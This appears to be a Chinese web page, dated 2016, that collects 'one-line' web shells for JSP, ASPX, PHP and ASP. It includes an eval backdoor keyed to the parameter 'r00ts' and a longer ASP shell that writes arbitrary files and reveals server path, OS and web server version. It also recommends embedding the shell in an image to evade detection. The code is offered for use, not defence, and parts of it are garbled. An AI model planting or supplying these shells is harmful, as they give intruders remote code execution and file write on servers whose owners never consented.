时间:2016-01-18 10:12 来源: 我爱IT技术网 作者:佚名
<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%>
提交客户端
<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>
ASPX一句话
<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>
再补充几个:
推荐还是把一句话加进图片里面去。
普通的php一句话:<?php @eval($_POST['r00ts']);?>
普通的asp一句话:<%eval(Request.Item["r00ts"],”unsafe”);%>
aspx突破一流的:
[code]
dim da
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
Response.Write "yes"
else
Response.Write "no"
end if
err.clear
end if
set da=nothing
set fos=nothing
Response.Write "<form action=" method=post>"
Response.Write "<input type=text name=path>"
Response.Write "<br>"
Response.Write "当前文件路径:"&server.mappath(request.servervariables("script_name"))
Response.Write "<br>"
Response.Write "操作系统为:"&Request.ServerVariables("OS")
Response.Write "<br>"
Response.Write "WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")
Response.Write "<br>"
Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>"
Response.Write "<br>"
Response.Write "<input type=submit value=save>"
Response.Write "</form>"
</Script>
- 评论列表(网友评论仅供网友表达个人看法,并不表明本站同意其观点或证实其描述)
-